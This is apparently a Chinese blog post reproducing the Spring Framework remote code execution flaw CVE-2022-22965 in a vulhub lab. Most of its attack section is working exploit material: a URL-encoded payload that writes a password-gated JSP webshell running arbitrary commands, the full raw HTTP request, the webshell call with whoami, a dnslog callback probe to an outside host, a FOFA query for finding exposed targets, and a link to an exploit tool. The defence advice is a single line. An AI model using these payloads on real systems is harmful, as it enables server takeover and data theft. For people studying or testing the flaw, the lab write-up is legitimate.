Loading

CVE-2022-22965 Spring Framework远程代码执行漏洞复现

0x00-引言


最近被论文搞的脑袋痛

0x01-环境搭建


靶机:CentOS Linux 7

攻击机:windows server 2016 && Kail

环境:vulhub

项目地址:https://github.com/vulhub/vulhub

搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)

0x02-漏洞描述与分析


通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值,从而触发pipeline机制并在任意路径下写入文件。

利用条件:

JDK版本>=9
使用对象绑定方式 (基本类型绑定场景不影响)
使用Tomcat容器

影响版本:

Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20
并且使用了JDK版本 >= 9

反弹dnslog记录:

?class.module.classLoader.resources.context.configFile=http://spring-jayway.i1y1tg.dnslog.cn/test&class.module.classLoader.resources.context.configFile.content.aaa=xxx

fofa语句

app="vmware-SpringBoot-Framework"

0x03-漏洞复现


01-手工复现

部分poc

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

打开靶场image-20220407212009400

使用hackbar输入poc-抓包

改包为以下

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.234.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 0

image-20220407212323203

访问链接http://192.168.234.128:8080/tomcatwar.jsp?pwd=j&cmd=whoami

image-20220407212434617

02-工具写入

https://github.com/crow821/crowsec/tree/master/Spring_RCE_CVE-2022-22965

image-20220407212740444

0x05-防御


升级或不用jdk9

0x06-参考


https://mp.weixin.qq.com/s/NYYOYvfnr0RbBbrlS0tlVA

posted @ 2022-04-12 19:04  美式加糖  阅读(1147)  评论(0编辑  收藏  举报